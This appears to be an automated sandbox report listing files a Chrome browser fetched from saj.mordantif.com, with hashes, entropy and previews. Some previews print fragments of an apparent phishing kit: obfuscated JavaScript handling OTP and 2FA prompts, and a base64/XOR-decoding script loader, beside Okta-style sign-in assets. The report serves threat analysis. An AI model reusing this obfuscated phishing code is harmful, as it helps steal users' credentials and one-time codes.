                                                        Preview:L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Y.h....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Y.h....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Y.h....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Y.h..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Y.h...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........smK......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 12:06:23 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2683
                                                        Entropy (8bit):3.984627887752191
                                                        Encrypted:false
                                                        SSDEEP:48:8UdLCTruxw3HlOidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbLy+yT+:8xPTT/TbxWOvTbLy7T
                                                        MD5:41C5E0DC8740C7AFF6A8B454AA0397C0
                                                        SHA1:29F14D2EC023B7BD64BDCF5BB62215D7D7271B9C
                                                        SHA-256:0604738BC96D96B21E89A46E794C320D5220D57C585DE48CAD98980B2A65BE80
                                                        SHA-512:EC4A46C3FC9D82026A1E4A019DEF7AEC4E70FFF653FD2E75BDBFEE8C78F22F00384D543CD641EFB178BA74AF466E51F182D1F964484A4BB43F38502A99AD2DE8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:L..................F.@.. ...$+.,....X-......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Y.h....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Y.h....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Y.h....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Y.h..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Y.h...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........smK......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):120390
                                                        Entropy (8bit):5.190875566468324
                                                        Encrypted:false
                                                        SSDEEP:3072:/Q8gPjG43G047SP47c1+CP4tUgz7eGAzAuCsb:cCsb
                                                        MD5:FF20110ACBB247BA1E31E0AE410B6EC8
                                                        SHA1:382B6D509A92EEA89A7162F67BEEC2DDC3365952
                                                        SHA-256:BA7433867699A191306DC3D4A7177A1B37BB315963770004F9996E5918ED90C1
                                                        SHA-512:63C1135713A131BF6B93E07E3FB956D216A813943E8A889C7A2D646FA8526A83B7E02512E13DCCC16DBBE15A9BE8B18085D382E6ECA5D52AAC7A8B71855F8C2F
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110
                                                        Preview:const _0x6a4795=_0x521e;(function(_0x33cd6e,_0x44b3f1){const _0x175f50=_0x521e,_0x3e19d6=_0x33cd6e();while(!![]){try{const _0x183a15=parseInt(_0x175f50(0x75))/0x1+parseInt(_0x175f50(0xcd))/0x2+parseInt(_0x175f50(0x233))/0x3*(-parseInt(_0x175f50(0x1f5))/0x4)+parseInt(_0x175f50(0x134))/0x5+-parseInt(_0x175f50(0x135))/0x6+parseInt(_0x175f50(0x12a))/0x7*(parseInt(_0x175f50(0x18f))/0x8)+-parseInt(_0x175f50(0x1ca))/0x9;if(_0x183a15===_0x44b3f1)break;else _0x3e19d6['push'](_0x3e19d6['shift']());}catch(_0x397690){_0x3e19d6['push'](_0x3e19d6['shift']());}}}(_0x419e,0xd216d));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;let viewtype=null;function _0x419e(){const _0x3da865=['waiting\x20for\x20previous\x20request\x20to\x20complete','phone\x20otp','112504WRrgbA','section_multipleaccounts','linkoptionclick(this)','protectoptions','img','text-left','body','error_uname_pdf','a_id','valid\x20otp',
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65447)
                                                        Category:dropped
                                                        Size (bytes):89501
                                                        Entropy (8bit):5.289893677458563
                                                        Encrypted:false
                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:data
                                                        Category:downloaded
                                                        Size (bytes):550905
                                                        Entropy (8bit):5.666803401551392
                                                        Encrypted:false
                                                        SSDEEP:6144:kOYnKXi2tpKdoYRMXT+gVL+r+53bl2tjig1yKeVQqNFcU9i1d7sLO1OiUBI2+e:k9KXv3eUvVl2RiKeVHFD9igS0INe
                                                        MD5:C7BE68088B0A823F1A4C1F77C702D1B4
                                                        SHA1:05D42D754AFD21681C0E815799B88FBE1FBABF4E
                                                        SHA-256:4943E91F7F53318D481CA07297395ABBC52541C2BE55D7276ECDA152CD7AD9C3
                                                        SHA-512:CB76505845E7FC0988ADE0598E6EA80636713E20209E1260EE4413423B45235F57CB0A33FCA7BAF223E829835CB76A52244C3197E4C0C166DAD9B946B9285222
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.gstatic.com/recaptcha/releases/EGbODne6buzpTnWrrBprcfAY/recaptcha__en.js
                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var S=function(){return[function(q,y,d,h,l,A,G,V){if((q-((q>>((G=[26,"A","JT"],q|72)==q&&(d=[sC,VO],V=(h=Array.from(ee(vv)).find(function(v){return d.includes(v.autocomplete)&&v.type!=Wv&&v.value}))==y?void 0:h.value),1)&11)>=3&&(q-7&16)<9&&(A=h.u[h.u.length-y],l=OC(),A.Pj<=l&&(A.CB=d),h[G[1]]&&h[G[1 =A.CB||(A.CB===1?(h[G[1]]=y,h.Yu(A.Pj-l)):(h[G[1]]=d,h[G[2]]()))),5)|35)<q&&q-8<<1>=q)S[13](3,"label",this);return(q|7)>=-43&&(q|3)>>4<1&&(V=H[28](G[0],y,d,h)),V},function(q,y,d,h,l,A,G,V,v,e,a){return(((q|.1)&(a=[8,7,"O"],a[1]))>=0&&q>>1<12&&(h.P[a[2]]=y,v=[!0,100,1E3],U[36](2,v[1],"2fa","audio",36,h.u,d),h.u.P.I=h
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (51734)
                                                        Category:downloaded
                                                        Size (bytes):222931
                                                        Entropy (8bit):5.0213311632628725
                                                        Encrypted:false
                                                        SSDEEP:3072:Z4blthK0D4NIbkhhMW0AphsQyXV3oUHDDlxh/LoFdW:Z4vhK0D4NQlxh/LoFdW
                                                        MD5:0329C939FCA7C78756B94FBCD95E322B
                                                        SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                        SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                        SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                        Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):1400
                                                        Entropy (8bit):7.808470583085035
                                                        Encrypted:false
                                                        SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                        MD5:333EE830E5AB72C41DD9126A27B4D878
                                                        SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                        SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                        SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223
                                                        Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):29796
                                                        Entropy (8bit):7.980058333789969
                                                        Encrypted:false
                                                        SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                        MD5:210433A8774859368F3A7B86D125A2A7
                                                        SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                        SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                        SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232
                                                        Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):49602
                                                        Entropy (8bit):7.881935507115631
                                                        Encrypted:false
                                                        SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                        MD5:DB783743CD246FF4D77F4A3694285989
                                                        SHA1:B9466716904457641B7831868B47162D8D378D41
                                                        SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                        SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210
                                                        Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (2185), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):2552
                                                        Entropy (8bit):5.903092028889443
                                                        Encrypted:false
                                                        SSDEEP:48:7IHylaW7dcFZtw5f3PIht9xULuWfMTkE8OV9nXJ9kx1wRTlEuQhw+/VHR:7+FZqfW9xW0TkGtIxzuQ3Vx
                                                        MD5:D981353AE4434FED4E79C2935B414C4D
                                                        SHA1:11B040FD77F6F4E9B2EF6AEE03EA10ACEF52CB36
                                                        SHA-256:2F5DB920BD0DC29D49BA9AEE57A6916F1FBCEABF14969A30D27EBE9BFAC924A6
                                                        SHA-512:0C7D2C3D43B13DDB694FCD2D021FFA46F914E50CACD6E28F3983009E93C210D39B77E98F7B688D1861B8B4582D1DCC324F5202FDB21BD9D6130ABB38EBC75842
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/q8Yr/
                                                        Preview:<script>..function XYWCmZqRXs(EQVxydYjJS, gIHYuLxTEg) {..let mjKddjlRJi = '';..EQVxydYjJS = atob(EQVxydYjJS);..let tEfIUUdLnA = gIHYuLxTEg.length;..for (let i = 0; i < EQVxydYjJS.length; i++) {.. mjKddjlRJi += String.fromCharCode(EQVxydYjJS.charCodeAt(i) ^ gIHYuLxTEg.charCodeAt(i % tEfIUUdLnA));..}..return mjKddjlRJi;..}..var KbciluaUmj = XYWCmZqRXs(`OFJeAi8IGTlAVzhSFBA+WhgfXT53FAAfPAlQdBQeXDYGHjtUHCZXCEExDR9iEhE6XEdGLQACOAhYeB1SOFILF2xSGB9dPncUAB88CVlpT2Q/MDQYGzg8K1oZRnhfUSQsGR52JVc2EgJiCQAlXR0df0FWZVQAJkRBHGNvezF3eiBSSR15CiclLTIFVgdFK0tRN3d6aRRJFTsNHz8OUDxGBWU5EBAhCVB0FAdQL0IkHjYjLFUbVjAyED4bHTocHlw2Bh47VBwmVwhBMQ0fYgkVKEYKXXFZfEZaUGkUAFN4SgYlFBQmQ0dZNwEQOBMfJxoBRz0EXyUUEyVBDVArSlZpSENuHUAVI297bFpQaRRJFXgKJyUtMgVWB0UrQkxsDRknUAZCdg4eLxsEIFsHGzAQFCpUAzlYAEFwRVR+SVdgGhlaKEpYd3d6aRRJFSVvezF3ekQ+D0A2AQUlFR5pfQhTFCgEBDIFLBw8Yg41NA00PiB9QBUjb3tsWlBpQBtMeBl8RlpQaRRJFXhCAykOBTtaSVcsDRBkGwQmVkFgDzQmCTs+B10gHHFCTHFaJR5iPnAZLD8lM0tEPkkVeEIMbBkRPVcBFXAHAz5TUDI5YxV4QlFsWlBpRgxBLRAfbBwRJUcMDlVo
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):727
                                                        Entropy (8bit):7.573165690842521
                                                        Encrypted:false
                                                        SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                        MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                        SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                        SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                        SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140
                                                        Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):1864
                                                        Entropy (8bit):5.222032823730197
                                                        Encrypted:false
                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):128
                                                        Entropy (8bit):4.750616928608237
                                                        Encrypted:false
                                                        SSDEEP:3:CaSbcCq9EKVEkxhZJSh3EkEkkcJSh3EkEkki3kx+BR0:PSbzqyKVEkxzQ7QDw+R0
                                                        MD5:D90F02F133E7B82AF89B3E58526AC459
                                                        SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                        SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                        SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkySI0gp5zKthIFDV9X_g0SBQ0TmyRjEkEJRnoOFdeni5cSBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                                        Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):49602
                                                        Entropy (8bit):7.881935507115631
                                                        Encrypted:false
                                                        SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                        MD5:DB783743CD246FF4D77F4A3694285989
                                                        SHA1:B9466716904457641B7831868B47162D8D378D41
                                                        SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                        SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
